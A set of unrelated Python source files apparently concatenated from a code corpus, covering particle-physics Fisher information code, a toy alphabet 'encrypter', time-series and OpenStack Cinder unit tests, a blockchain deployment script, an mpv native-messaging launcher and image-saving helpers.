if dynamic_binning:
n_bins_total = nbins
bin_boundaries = self._calculate_dynamic_binning(observable, theta, nbins, None, cuts, efficiency_functions)
else:
n_bins_total = nbins + 2
bin_boundaries = np.linspace(histrange[0], histrange[1], num=nbins + 1)
# # Number of bins
# n_bins_total = nbins + 2
# bin_boundaries = np.linspace(histrange[0], histrange[1], num=nbins + 1)
# Prepare output
weights_benchmarks_bins = np.zeros((n_bins_total, self.n_benchmarks))
# Main loop: truth-level case
for observations, weights in self.event_loader():
# Cuts
cut_filter = [self._pass_cuts(obs_event, cuts) for obs_event in observations]
observations = observations[cut_filter]
weights = weights[cut_filter]
# Efficiencies
efficiencies = np.array(
[self._eval_efficiency(obs_event, efficiency_functions) for obs_event in observations]
)
weights *= efficiencies[:, np.newaxis]
# Evaluate histogrammed observable
histo_observables = np.asarray([self._eval_observable(obs_event, observable) for obs_event in observations])
# Find bins
bins = np.searchsorted(bin_boundaries, histo_observables)
assert ((0 <= bins) & (bins < n_bins_total)).all(), "Wrong bin {}".format(bins)
# Add up
for i in range(n_bins_total):
if len(weights[bins == i]) > 0:
weights_benchmarks_bins[i] += np.sum(weights[bins == i], axis=0)
# Get morphing matrices
theta_matrix = self._get_theta_benchmark_matrix(theta, zero_pad=False) # (n_benchmarks_phys,)
dtheta_matrix = self._get_dtheta_benchmark_matrix(theta, zero_pad=False) # (n_parameters, n_benchmarks_phys)
# Calculate xsecs in bins
sigma_bins = mdot(theta_matrix, weights_benchmarks_bins) # (n_bins,)
dsigma_bins = mdot(dtheta_matrix, weights_benchmarks_bins) # (n_parameters,n_bins,)
return bin_boundaries, sigma_bins, dsigma_bins
def nuisance_constraint_information(self):
""" Builds the Fisher information term representing the Gaussian constraints on the nuisance parameters """
diagonal = np.array([0.0 for _ in range(self.n_parameters)] + [1.0 for _ in range(self.n_nuisance_parameters)])
return np.diag(diagonal)
def _check_binning_stats(
self, weights_benchmarks, weights_benchmark_uncertainties, theta, report=5, n_bins_last_axis=None
):
theta_matrix = self._get_theta_benchmark_matrix(theta, zero_pad=False) # (n_benchmarks_phys,)
sigma = mdot(theta_matrix, weights_benchmarks) # Shape (n_bins,)
sigma_uncertainties = mdot(theta_matrix, weights_benchmark_uncertainties) # Shape (n_bins,)
rel_uncertainties = sigma_uncertainties / np.maximum(sigma, 1.0e-12)
order = np.argsort(rel_uncertainties)[::-1]
logger.info("Bins with largest statistical uncertainties on rates:")
for i_bin in order[:report]:
bin_nd = i_bin + 1
if n_bins_last_axis is not None:
bin_nd = (i_bin // n_bins_last_axis + 1, i_bin % n_bins_last_axis + 1)
logger.info(
" Bin %s: (%.5f +/- %.5f) fb (%.0f %%)",
bin_nd,
1000.0 * sigma[i_bin],
1000.0 * sigma_uncertainties[i_bin],
100.0 * rel_uncertainties[i_bin],
)
def _calculate_binning(
self, bins, cuts, efficiency_functions, histrange, n_events_dynamic_binning, observable, theta
):
dynamic_binning = histrange is None and isinstance(bins, int)
if dynamic_binning:
n_bins_total = bins
bin_boundaries = self._calculate_dynamic_binning(
observable, theta, bins, n_events_dynamic_binning, cuts, efficiency_functions
)
logger.debug("Automatic dynamic binning: bin boundaries %s", bin_boundaries)
elif isinstance(bins, int):
n_bins_total = bins + 2
bin_boundaries = np.linspace(histrange[0], histrange[1], num=bins + 1)
else:
bin_boundaries = bins
n_bins_total = len(bins) + 1
return bin_boundaries, n_bins_total
def _calculate_fisher_information(
self,
theta,
weights_benchmarks,
luminosity=300000.0,
include_nuisance_parameters=True,
sum_events=False,
calculate_uncertainty=False,
weights_benchmark_uncertainties=None,
):
"""
Low-level function that calculates a list of full Fisher information matrices for a given parameter point and
benchmark weights. Do not use this function directly, instead use the other `FisherInformation` functions.
Parameters
----------
theta : ndarray
Parameter point.
weights_benchmarks : ndarray
Benchmark weights. Shape (n_events, n_benchmark).
luminosity : float, optional
Luminosity in pb^-1. Default value: 300000.
include_nuisance_parameters : bool, optional
If True, nuisance parameters are taken into account. Default value: True.
sum_events : bool, optional
If True, returns the summed FIsher information. Otherwise, a list of Fisher
information matrices for each event. Default value: False.
calculate_uncertainty : bool, optional
Whether an uncertainty of the result is calculated. Note that this uncertainty is currently only
implemented for the "physical" part of the FIsher information, not for the nuisance parameters. Default
value: False.
weights_benchmark_uncertainties : ndarray or None, optional
If calculate_uncertainty is True, weights_benchmark_uncertainties sets the uncertainties on each entry of
weights_benchmarks. If None, weights_benchmark_uncertainties = weights_benchmarks is assumed.
Returns
-------
fisher_information : ndarray
If sum_events is True, the return value is an nxn matrix, the total Fisher information
summed over all events. Otherwise, a n_events x n_parameters x n_parameters tensor is returned that
includes the Fisher information matrices for each event separately.
fisher_information_uncertainty : ndarray
Only returned if calculate_uncertainty is True. Covariance matrix of the Fisher information. Note that this
does not take into account any uncertainty on the nuisance parameter part of the Fisher information, and
correlations between events are neglected. Note that independent of sum_events, the covariance matrix is
always summed over the events.
"""
include_nuisance_parameters = include_nuisance_parameters and self.include_nuisance_parameters
# Get morphing matrices
theta_matrix = self._get_theta_benchmark_matrix(theta, zero_pad=False) # (n_benchmarks_phys,)
dtheta_matrix = self._get_dtheta_benchmark_matrix(theta, zero_pad=False) # (n_parameters, n_benchmarks_phys)
# Get differential xsec per event, and the derivative wrt to theta
sigma = mdot(theta_matrix, weights_benchmarks) # Shape (n_events,)
total_xsec = np.sum(sigma)
inv_sigma = sanitize_array(1.0 / sigma) # Shape (n_events,)
dsigma = mdot(dtheta_matrix, weights_benchmarks) # Shape (n_parameters, n_events)
# Calculate physics Fisher info for this event
fisher_info_phys = luminosity * np.einsum("n,in,jn->nij", inv_sigma, dsigma, dsigma)
# Nuisance parameter Fisher info
if include_nuisance_parameters:
nuisance_a = self.nuisance_morpher.calculate_a(weights_benchmarks) # Shape (n_nuisance_params, n_events)
# grad_i dsigma(x), where i is a nuisance parameter, is given by
# sigma[np.newaxis, :] * a
fisher_info_nuisance = luminosity * np.einsum("n,in,jn->nij", sigma, nuisance_a, nuisance_a)
fisher_info_mix = luminosity * np.einsum("in,jn->nij", dsigma, nuisance_a)
fisher_info_mix_transposed = luminosity * np.einsum("in,jn->nji", dsigma, nuisance_a)
n_all_parameters = self.n_parameters + self.n_nuisance_parameters
fisher_info = np.zeros((fisher_info_phys.shape[0], n_all_parameters, n_all_parameters))
fisher_info[:, : self.n_parameters, : self.n_parameters] = fisher_info_phys
fisher_info[:, : self.n_parameters, self.n_parameters :] = fisher_info_mix
fisher_info[:, self.n_parameters :, : self.n_parameters] = fisher_info_mix_transposed
fisher_info[:, self.n_parameters :, self.n_parameters :] = fisher_info_nuisance
else:
n_all_parameters = self.n_parameters
fisher_info = fisher_info_phys
# Error propagation
if calculate_uncertainty:
if weights_benchmarks.shape[1] > self.n_benchmarks_phys:
weights_benchmarks_phys = weights_benchmarks[:, np.logical_not(self.benchmark_is_nuisance)]
else:
weights_benchmarks_phys = weights_benchmarks
n_events = weights_benchmarks_phys.shape[0]
# Input uncertainties
if weights_benchmark_uncertainties is None:
weights_benchmark_uncertainties = weights_benchmarks_phys # Shape (n_events, n_benchmarks_phys)
# Build covariance matrix of inputs
# We assume full correlation between weights_benchmarks[i, b1] and weights_benchmarks[i, b2]
covariance_inputs = np.zeros((n_events, self.n_benchmarks_phys, self.n_benchmarks_phys))
for i in range(n_events):
for b1 in range(self.n_benchmarks_phys):
for b2 in range(self.n_benchmarks_phys):
if b1 == b2: # Diagonal
covariance_inputs[i, b1, b2] = weights_benchmark_uncertainties[i, b1] ** 2
else: # Off-diagonal, same event
covariance_inputs[i, b1, b2] = (
weights_benchmark_uncertainties[i, b1] * weights_benchmark_uncertainties[i, b2]
)
# Jacobian
temp1 = np.einsum("ib,jn,n->ijnb", dtheta_matrix, dsigma, inv_sigma)
temp2 = np.einsum("jb,in,n->ijnb", dtheta_matrix, dsigma, inv_sigma)
temp3 = np.einsum("b,in,jn,n,n->ijnb", theta_matrix, dsigma, dsigma, inv_sigma, inv_sigma)
temp1, temp2, temp3 = sanitize_array(temp1), sanitize_array(temp2), sanitize_array(temp3)
jacobian = luminosity * (temp1 + temp2 + temp3) # (n_parameters, n_parameters, n_events, n_benchmarks_phys)
# Covariance of information
covariance_information_phys = np.einsum("ijnb,nbc,klnc->ijkl", jacobian, covariance_inputs, jacobian)
if include_nuisance_parameters:
covariance_information = np.zeros(
(n_all_parameters, n_all_parameters, n_all_parameters, n_all_parameters)
)
covariance_information[
: self.n_parameters, : self.n_parameters, : self.n_parameters, : self.n_parameters
] = covariance_information_phys
else:
covariance_information = covariance_information_phys
if sum_events:
return np.sum(fisher_info, axis=0), covariance_information
return fisher_info, covariance_information
if sum_events:
return np.sum(fisher_info, axis=0)
return fisher_info
def _pass_cuts(self, observations, cuts=None):
"""
Checks if an event, specified by a list of observations, passes a set of cuts.
Parameters
----------
observations : list of float
list of float. Values of the observables for a single event.
cuts : list of str or None, optional
Each entry is a parseable Python expression that returns a bool (True if the event should pass a cut,
False otherwise). Default value: None.
Returns
-------
passes : bool
True if the event passes all cuts, False otherwise.
"""
# Check inputs
if cuts is None:
cuts = []
assert len(observations) == len(self.observables), "Mismatch between observables and observations"
# Variables that can be used in cuts
variables = math_commands()
for observable_name, observable_value in zip(self.observables, observations):
variables[observable_name] = observable_value
# Check cuts
for cut in cuts:
if not bool(eval(cut, variables)):
return False
return True
def _eval_efficiency(self, observations, efficiency_functions=None):
"""
Calculates the efficiency for an event.
Parameters
----------
observations : list of float
Values of the observables.
efficiency_functions : list of str or None
Each entry is a parseable Python expression that returns a float for the efficiency of one component.
Default value: None.
Returns
-------
efficiency : float
Efficiency (0. <= efficiency <= 1.), product of the results of the calls to all entries in
efficiency_functions.
"""
# Check inputs
if efficiency_functions is None:
efficiency_functions = []
assert len(observations) == len(self.observables), "Mismatch between observables and observations"
# Variables that can be used in efficiency functions
variables = math_commands()
for observable_name, observable_value in zip(self.observables, observations):
variables[observable_name] = observable_value
# Check cuts
efficiency = 1.0
for efficency_function in efficiency_functions:
efficiency *= float(eval(efficency_function, variables))
return efficiency
def _eval_observable(self, observations, observable_definition):
"""
Calculates an observable expression for an event.
Parameters
----------
observations : ndarray
Values of the observables for an event, should have shape `(n_observables,)`.
observable_definition : str
A parseable Python expression that returns the value of the observable to be calculated.
Returns
-------
observable_value : float
Value of the observable defined in observable_definition.
"""
assert len(observations) == len(self.observables), "Mismatch between observables and observations"
# Variables that can be used in efficiency functions
variables = math_commands()
for observable_name, observable_value in zip(self.observables, observations):
variables[observable_name] = observable_value
# Check cuts
return float(eval(observable_definition, variables))
def _calculate_xsec(
self,
theta=None,
cuts=None,
efficiency_functions=None,
return_benchmark_xsecs=False,
return_error=False,
include_nuisance_parameters=True,
start_event=0,
):
"""
Calculates the total cross section for a parameter point.
Parameters
----------
theta : ndarray or None, optional
The parameter point. If None, return_benchmark_xsecs should be True. Default value: None.
cuts : list of str or None, optional
Cuts. Each entry is a parseable Python expression that returns a bool (True if the event should pass a cut,
False otherwise). Default value: None.
efficiency_functions : list of str or None
Efficiencies. Each entry is a parseable Python expression that returns a float for the efficiency of one
component. Default value: None.
return_benchmark_xsecs : bool, optional
If True, this function returns the benchmark xsecs. Otherwise, it returns the xsec at theta. Default value:
False.
return_error : bool, optional
If True, this function also returns the square root of the summed squared weights.
include_nuisance_parameters : bool, optional
If True and if return_benchmark_xsecs is True, the nuisance benchmarks are included in the output. Default
value: True.
start_event : int, optional
Index of first event in MadMiner file to consider. Default value: 0.
Returns
-------
xsec : ndarray or float
If return_benchmark_xsecs is True, an ndarray of benchmark xsecs in pb is returned. Otherwise, the cross
section at theta in pb is returned.
xsec_uncertainty : ndarray or float
Only returned if return_error is True. Uncertainty (square root of the summed squared weights) on xsec.
"""
logger.debug("Calculating total cross section for theta = %s", theta)
# Input
if cuts is None:
cuts = []
if efficiency_functions is None:
efficiency_functions = []
assert (theta is not None) or return_benchmark_xsecs, "Please supply theta or set return_benchmark_xsecs=True"
# Total xsecs for benchmarks
xsecs_benchmarks = None
xsecs_uncertainty_benchmarks = None
for observations, weights in self.event_loader(
start=start_event, include_nuisance_parameters=include_nuisance_parameters
):
# Cuts
cut_filter = [self._pass_cuts(obs_event, cuts) for obs_event in observations]
observations = observations[cut_filter]
weights = weights[cut_filter]
# Efficiencies
efficiencies = np.array(
[self._eval_efficiency(obs_event, efficiency_functions) for obs_event in observations]
)
weights *= efficiencies[:, np.newaxis]
# xsecs
if xsecs_benchmarks is None:
xsecs_benchmarks = np.sum(weights, axis=0)
xsecs_uncertainty_benchmarks = np.sum(weights ** 2, axis=0)
else:
xsecs_benchmarks += np.sum(weights, axis=0)
xsecs_uncertainty_benchmarks += np.sum(weights ** 2, axis=0)
assert xsecs_benchmarks is not None, "No events passed cuts"
xsecs_uncertainty_benchmarks = xsecs_uncertainty_benchmarks ** 0.5
logger.debug("Benchmarks xsecs [pb]: %s", xsecs_benchmarks)
if return_benchmark_xsecs:
if return_error:
return xsecs_benchmarks, xsecs_uncertainty_benchmarks
return xsecs_benchmarks
# Translate to xsec for theta
theta_matrix = self._get_theta_benchmark_matrix(theta)
xsec = mdot(theta_matrix, xsecs_benchmarks)
xsec_error = mdot(theta_matrix, xsecs_uncertainty_benchmarks)
logger.debug("Theta matrix: %s", theta_matrix)
logger.debug("Cross section at theta: %s pb", xsec)
if return_error:
return xsec, xsec_error
return xsec
def _calculate_dynamic_binning(
self, observable, theta, n_bins, n_events=None, cuts=None, efficiency_functions=None
):
if cuts is None:
cuts = []
if efficiency_functions is None:
efficiency_functions = []
# Quantile values
quantile_values = np.linspace(0.0, 1.0, n_bins + 1)
# Get data
x_pilot, weights_pilot = next(self.event_loader(batch_size=n_events))
# Cuts
cut_filter = [self._pass_cuts(x, cuts) for x in x_pilot]
x_pilot = x_pilot[cut_filter]
weights_pilot = weights_pilot[cut_filter]
# Efficiencies
efficiencies = np.array([self._eval_efficiency(x, efficiency_functions) for x in x_pilot])
weights_pilot *= efficiencies[:, np.newaxis]
# Evaluate histogrammed observable
histo_observables_pilot = np.asarray([self._eval_observable(x, observable) for x in x_pilot])
# Weights at theta
theta_matrix = self._get_theta_benchmark_matrix(theta)
weight_theta_pilot = mdot(theta_matrix, weights_pilot)
# Bin boundaries
bin_boundaries = weighted_quantile(histo_observables_pilot, quantile_values, weight_theta_pilot)
bin_boundaries = bin_boundaries[1:-1]
return bin_boundaries
# Aliases for backward compatibility
calculate_fisher_information_full_truth = truth_information
calculate_fisher_information_full_detector = full_information
calculate_fisher_information_rate = rate_information
calculate_fisher_information_hist1d = histo_information
calculate_fisher_information_hist2d = histo_information_2d
histogram_of_fisher_information = histogram_of_information
calculate_fisher_information_nuisance_constraints = nuisance_constraint_information
|
the-stack_0_1566 | import math
import itertools
def menu():
while True:
try:
print(menuStr)
print(stars)
choose = int(input("For Encrypter = 1\nFor Decrypter = 2\nFor Exit = 0\nChoose : "))
print(stars)
break
except:
print("Girdi de bir problem var.")
pass
if choose == 1:
print("Encrypter opening...")
print(stars)
myEncrypter()
elif choose == 2:
print("Decrypter opening...")
myDecrypter()
elif choose == 0:
print("Cya dude.")
else:
print("Hata menüde.")
menu()
def myEncrypter():
inputWord = str(input("Input : "))
print(stars)
iList = list(inputWord)
aList = []
tempList = []
outputList = []
t=0
for item in iList:
try:
aList.append(((alphabet.index(item)+1)*2)%29)
except:
print("Şuan sadece alfabe ile işlem yapabilirsiniz.")
iList.clear()
myEncrypter()
for x in aList:
tempList = list(str(math.sin(x)))
tempList.reverse()
for items in itertools.islice(tempList,0,3):
outputList.append(items)
for a in outputList:
if t == 0 :print("Sonucunuz: ",end="")
t+=1
print(a,end="")
def myDecrypter():
print("b")
alphabet = ['a', 'b', 'c', 'ç', 'd', 'e', 'f', 'g', 'ğ', 'h', 'ı', 'i', 'j',
'k', 'l', 'm', 'n', 'o', 'ö', 'p', 'r', 's', 'ş', 't', 'u', 'ü',
'v', 'y', 'z']
menuStr = """
_______________________________________________________________________________________
_____ _
_ __ ___ _ _| ____|_ __ ___ _ __ _ _ _ __ | |_ ___ _ __
| '_ ` _ \| | | | _| | '_ \ / __| '__| | | | '_ \| __/ _ \ '__|
| | | | | | |_| | |___| | | | (__| | | |_| | |_) | || __/ |
|_| |_| |_|\__, |_____|_| |_|\___|_| \__, | .__/ \__\___|_|
|___/ |___/|_| v.0.0.2
_________________________________________________________________________________________
"""
stars = "_" * 89
menu() |
the-stack_0_1569 | import unittest
import pandas as pd
import numpy as np
from copy import deepcopy
from darts.dataprocessing.transformers import BoxCox, Mapper
from darts.utils.timeseries_generation import sine_timeseries, linear_timeseries
from darts import TimeSeries
class BoxCoxTestCase(unittest.TestCase):
sine_series = sine_timeseries(length=50, value_y_offset=5, value_frequency=0.05)
lin_series = linear_timeseries(start_value=1, end_value=10, length=50)
multi_series = sine_series.stack(lin_series)
def test_boxbox_lambda(self):
boxcox = BoxCox(lmbda=0.3)
boxcox.fit(self.multi_series)
self.assertEqual(boxcox._fitted_params, [[0.3, 0.3]])
boxcox = BoxCox(lmbda=[0.3, 0.4])
boxcox.fit(self.multi_series)
self.assertEqual(boxcox._fitted_params, [[0.3, 0.4]])
with self.assertRaises(ValueError):
boxcox = BoxCox(lmbda=[0.2, 0.4, 0.5])
boxcox.fit(self.multi_series)
boxcox = BoxCox(optim_method="mle")
boxcox.fit(self.multi_series)
lmbda1 = boxcox._fitted_params[0].tolist()
boxcox = BoxCox(optim_method="pearsonr")
boxcox.fit(self.multi_series)
lmbda2 = boxcox._fitted_params[0].tolist()
self.assertNotEqual(lmbda1, lmbda2)
def test_boxcox_transform(self):
log_mapper = Mapper(lambda x: np.log(x))
boxcox = BoxCox(lmbda=0)
transformed1 = log_mapper.transform(self.sine_series)
transformed2 = boxcox.fit(self.sine_series).transform(self.sine_series)
np.testing.assert_almost_equal(
transformed1.all_values(copy=False),
transformed2.all_values(copy=False),
decimal=4,
)
def test_boxcox_inverse(self):
boxcox = BoxCox()
transformed = boxcox.fit_transform(self.multi_series)
back = boxcox.inverse_transform(transformed)
pd.testing.assert_frame_equal(
self.multi_series.pd_dataframe(), back.pd_dataframe(), check_exact=False
)
def test_boxcox_multi_ts(self):
test_cases = [
([[0.2, 0.4], [0.3, 0.6]]), # full lambda
(0.4), # single value
None, # None
]
for lmbda in test_cases:
box_cox = BoxCox(lmbda=lmbda)
transformed = box_cox.fit_transform([self.multi_series, self.multi_series])
back = box_cox.inverse_transform(transformed)
pd.testing.assert_frame_equal(
self.multi_series.pd_dataframe(),
back[0].pd_dataframe(),
check_exact=False,
)
pd.testing.assert_frame_equal(
self.multi_series.pd_dataframe(),
back[1].pd_dataframe(),
check_exact=False,
)
def test_boxcox_multiple_calls_to_fit(self):
"""
This test checks whether calling the scaler twice is calculating new lambdas instead of
keeping the old ones
"""
box_cox = BoxCox()
box_cox.fit(self.sine_series)
lambda1 = deepcopy(box_cox._fitted_params)[0].tolist()
box_cox.fit(self.lin_series)
lambda2 = deepcopy(box_cox._fitted_params)[0].tolist()
self.assertNotEqual(
lambda1, lambda2, "Lambdas should change when the transformer is retrained"
)
def test_multivariate_stochastic_series(self):
transformer = BoxCox()
vals = np.random.rand(10, 5, 10)
series = TimeSeries.from_values(vals)
new_series = transformer.fit_transform(series)
series_back = transformer.inverse_transform(new_series)
# Test inverse transform
np.testing.assert_allclose(series.all_values(), series_back.all_values())
|
the-stack_0_1570 | #!/usr/bin/python3
from brownie import *
from scripts.deployment.deploy_protocol import deployProtocol
from scripts.deployment.deploy_loanToken import deployLoanTokens
from scripts.deployment.deploy_tokens import deployTokens, readTokens
from scripts.deployment.deploy_multisig import deployMultisig
import shared
import json
from munch import Munch
'''
Deploys all of the contracts.
1. deploys the tokens or reads exsiting token contracts.
if configData contains token addresses, use the given addresses
else, deploy new tokens
2. deploys the base protocol contracts.
3. deploys, configures and tests the loan token contracts.
4. writes the relevant contract addresses into swap_test.json.
'''
def main():
global configData
#owners = [accounts[0], accounts[1], accounts[2]]
requiredConf=2
configData = {} # deploy new tokens
'''
configData = {
'WRBTC': '0x69FE5cEC81D5eF92600c1A0dB1F11986AB3758Ab',
'SUSD': '0xCb46C0DdC60d18eFEB0e586c17AF6Ea36452DaE0',
'medianizer': '0x2d39Cc54dc44FF27aD23A91a9B5fd750dae4B218'
}
'''
thisNetwork = network.show_active()
if thisNetwork == "development":
acct = accounts[0]
elif thisNetwork == "testnet" or thisNetwork == "rsk-mainnet":
acct = accounts.load("rskdeployer")
else:
raise Exception("network not supported")
if('WRBTC' in configData and 'SUSD' in configData):
tokens = readTokens(acct, configData['WRBTC'], configData['SUSD'])
elif('SUSD' in configData):
tokens = deployWRBTC(acct, configData['SUSD'])
else:
tokens = deployTokens(acct)
if(not 'medianizer' in configData):
medianizer = deployMoCMockup(acct)
configData['medianizer'] = medianizer.address
if(not 'mocState' in configData):
mocState = deployBProPriceFeedMockup(acct)
configData['mocState'] = mocState.address
(sovryn, feeds) = deployProtocol(acct, tokens, configData['medianizer'])
(loanTokenSUSD, loanTokenWRBTC, loanTokenSettingsSUSD,
loanTokenSettingsWRBTC) = deployLoanTokens(acct, sovryn, tokens)
#deployMultisig(sovryn, acct, owners, requiredConf)
configData["sovrynProtocol"] = sovryn.address
configData["PriceFeeds"] = feeds.address
configData["WRBTC"] = tokens.wrbtc.address
configData["SUSD"] = tokens.susd.address
configData["loanTokenSettingsSUSD"] = loanTokenSettingsSUSD.address
configData["loanTokenSUSD"] = loanTokenSUSD.address
configData["loanTokenSettingsWRBTC"] = loanTokenSettingsWRBTC.address
configData["loanTokenRBTC"] = loanTokenWRBTC.address
with open('./scripts/swapTest/swap_test.json', 'w') as configFile:
json.dump(configData, configFile)
def deployMoCMockup(acct):
priceFeedMockup = acct.deploy(PriceFeedsMoCMockup)
priceFeedMockup.setHas(True)
priceFeedMockup.setValue(10000e18)
return priceFeedMockup
def deployBProPriceFeedMockup(acct):
bproPriceFeedMockup = acct.deploy(BProPriceFeedMockup)
bproPriceFeedMockup.setValue(20000e18)
return bproPriceFeedMockup |
the-stack_0_1571 | # Copyright 2011 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from cinderclient.v1 import client as cinder_client_v1
from cinderclient.v2 import client as cinder_client_v2
from requests_mock.contrib import fixture
from testtools import matchers
from nova import context
from nova import exception
from nova import test
from nova.volume import cinder
_image_metadata = {
'kernel_id': 'fake',
'ramdisk_id': 'fake'
}
class BaseCinderTestCase(object):
def setUp(self):
super(BaseCinderTestCase, self).setUp()
cinder.reset_globals()
self.requests = self.useFixture(fixture.Fixture())
self.api = cinder.API()
self.context = context.RequestContext('username',
'project_id',
auth_token='token',
service_catalog=self.CATALOG)
def flags(self, *args, **kwargs):
super(BaseCinderTestCase, self).flags(*args, **kwargs)
cinder.reset_globals()
def create_client(self):
return cinder.cinderclient(self.context)
def test_context_with_catalog(self):
self.assertEqual(self.URL, self.create_client().client.get_endpoint())
def test_cinder_http_retries(self):
retries = 42
self.flags(http_retries=retries, group='cinder')
self.assertEqual(retries, self.create_client().client.connect_retries)
def test_cinder_api_insecure(self):
# The True/False negation is awkward, but better for the client
# to pass us insecure=True and we check verify_cert == False
self.flags(insecure=True, group='cinder')
self.assertFalse(self.create_client().client.session.verify)
def test_cinder_http_timeout(self):
timeout = 123
self.flags(timeout=timeout, group='cinder')
self.assertEqual(timeout, self.create_client().client.session.timeout)
def test_cinder_api_cacert_file(self):
cacert = "/etc/ssl/certs/ca-certificates.crt"
self.flags(cafile=cacert, group='cinder')
self.assertEqual(cacert, self.create_client().client.session.verify)
class CinderTestCase(BaseCinderTestCase, test.NoDBTestCase):
"""Test case for cinder volume v1 api."""
URL = "http://localhost:8776/v1/project_id"
CATALOG = [{
"type": "volumev2",
"name": "cinderv2",
"endpoints": [{"publicURL": URL}]
}]
def create_client(self):
c = super(CinderTestCase, self).create_client()
self.assertIsInstance(c, cinder_client_v1.Client)
return c
def stub_volume(self, **kwargs):
volume = {
'display_name': None,
'display_description': None,
"attachments": [],
"availability_zone": "cinder",
"created_at": "2012-09-10T00:00:00.000000",
"id": '00000000-0000-0000-0000-000000000000',
"metadata": {},
"size": 1,
"snapshot_id": None,
"status": "available",
"volume_type": "None",
"bootable": "true"
}
volume.update(kwargs)
return volume
def test_cinder_endpoint_template(self):
endpoint = 'http://other_host:8776/v1/%(project_id)s'
self.flags(endpoint_template=endpoint, group='cinder')
self.assertEqual('http://other_host:8776/v1/project_id',
self.create_client().client.endpoint_override)
def test_get_non_existing_volume(self):
self.requests.get(self.URL + '/volumes/nonexisting',
status_code=404)
self.assertRaises(exception.VolumeNotFound, self.api.get, self.context,
'nonexisting')
def test_volume_with_image_metadata(self):
v = self.stub_volume(id='1234', volume_image_metadata=_image_metadata)
m = self.requests.get(self.URL + '/volumes/5678', json={'volume': v})
volume = self.api.get(self.context, '5678')
self.assertThat(m.last_request.path,
matchers.EndsWith('/volumes/5678'))
self.assertIn('volume_image_metadata', volume)
self.assertEqual(_image_metadata, volume['volume_image_metadata'])
class CinderV2TestCase(BaseCinderTestCase, test.NoDBTestCase):
"""Test case for cinder volume v2 api."""
URL = "http://localhost:8776/v2/project_id"
CATALOG = [{
"type": "volumev2",
"name": "cinder",
"endpoints": [{"publicURL": URL}]
}]
def setUp(self):
super(CinderV2TestCase, self).setUp()
cinder.CONF.set_override('catalog_info',
'volumev2:cinder:publicURL', group='cinder')
self.addCleanup(cinder.CONF.reset)
def create_client(self):
c = super(CinderV2TestCase, self).create_client()
self.assertIsInstance(c, cinder_client_v2.Client)
return c
def stub_volume(self, **kwargs):
volume = {
'name': None,
'description': None,
"attachments": [],
"availability_zone": "cinderv2",
"created_at": "2013-08-10T00:00:00.000000",
"id": '00000000-0000-0000-0000-000000000000',
"metadata": {},
"size": 1,
"snapshot_id": None,
"status": "available",
"volume_type": "None",
"bootable": "true"
}
volume.update(kwargs)
return volume
def test_cinder_endpoint_template(self):
endpoint = 'http://other_host:8776/v2/%(project_id)s'
self.flags(endpoint_template=endpoint, group='cinder')
self.assertEqual('http://other_host:8776/v2/project_id',
self.create_client().client.endpoint_override)
def test_get_non_existing_volume(self):
self.requests.get(self.URL + '/volumes/nonexisting',
status_code=404)
self.assertRaises(exception.VolumeNotFound, self.api.get, self.context,
'nonexisting')
def test_volume_with_image_metadata(self):
v = self.stub_volume(id='1234', volume_image_metadata=_image_metadata)
self.requests.get(self.URL + '/volumes/5678', json={'volume': v})
volume = self.api.get(self.context, '5678')
self.assertIn('volume_image_metadata', volume)
self.assertEqual(_image_metadata, volume['volume_image_metadata'])
|
the-stack_0_1573 | #!/usr/bin/env python3
import json
import os
import platform
import struct
import sys
import subprocess
def main():
message = get_message()
url = message.get("url")
args = ["mpv", "--", url] # need to remove terminal because it need to capture the output of yt-dlp
kwargs = {}
# https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/Native_messaging#Closing_the_native_app
if platform.system() == "Windows":
kwargs["creationflags"] = subprocess.CREATE_BREAKAWAY_FROM_JOB
# HACK(ww): On macOS, graphical applications inherit their path from `launchd`
# rather than the default path list in `/etc/paths`. `launchd` doesn't include
# `/usr/local/bin` in its default list, which means that any installations
# of MPV and/or youtube-dl under that prefix aren't visible when spawning
# from, say, Firefox. The real fix is to modify `launchd.conf`, but that's
# invasive and maybe not what users want in the general case.
# Hence this nasty hack.
if platform.system() == "Darwin":
path = os.environ.get("PATH")
os.environ["PATH"] = f"/usr/local/bin:{path}"
process = subprocess.Popen(args, stdout=subprocess.PIPE, stderr=subprocess.PIPE,**kwargs)
pOut, pErr = process.communicate() # @see https://docs.python.org/3/library/subprocess.html#subprocess.Popen.communicate
# Need to respond something to avoid "Error: An unexpected error occurred"
# in Browser Console.
if "ERROR" not in str(pOut) :
send_message("ok")
else :
send_message(pOut.decode("utf-8"))
# https://developer.mozilla.org/en-US/Add-ons/WebExtensions/Native_messaging#App_side
def get_message():
raw_length = sys.stdin.buffer.read(4)
if not raw_length:
return {}
length = struct.unpack("@I", raw_length)[0]
message = sys.stdin.buffer.read(length).decode("utf-8")
return json.loads(message)
def send_message(message):
content = json.dumps(message).encode("utf-8")
length = struct.pack("@I", len(content))
sys.stdout.buffer.write(length)
sys.stdout.buffer.write(content)
sys.stdout.buffer.flush()
if __name__ == "__main__":
main()
|
the-stack_0_1574 | """ @ saving utils
"""
import math
import torch
from torchvision import utils
import matplotlib.pyplot as plt
from PIL import Image
from torchvision import transforms
def numpy_grid(x, pad=0, nrow=None, uint8=True):
""" thin wrap to make_grid to return frames ready to save to file
args
pad (int [0]) same as utils.make_grid(padding)
nrow (int [None]) # defaults to horizonally biased rectangle closest to square
uint8 (bool [True]) convert to img in range 0-255 uint8
"""
x = x.clone().detach().cpu()
nrow = nrow or int(math.sqrt(x.shape[0]))
x = ((utils.make_grid(x, nrow=nrow, padding=pad).permute(1,2,0) - x.min())/(x.max()-x.min())).numpy()
if uint8:
x = (x*255).astype("uint8")
return x
def to_image(image, save=True, show=True, pad=1):
""" util tensor to image, show, save
"""
image = numpy_grid(image, pad=pad)
if save:
im = Image.fromarray(image)
im.save(save)
print(f"saved image {save}")
if show:
plt.imshow(image)
plt.axis("off")
plt.show()
return image
def strf (x):
""" format time output
strf = lambda x: f"{int(x//86400)}D{int((x//3600)%24):02d}:{int((x//60)%60):02d}:{int(x%60):02d}s"
"""
days = int(x//86400)
hours = int((x//3600)%24)
minutes = int((x//60)%60)
seconds = int(x%60)
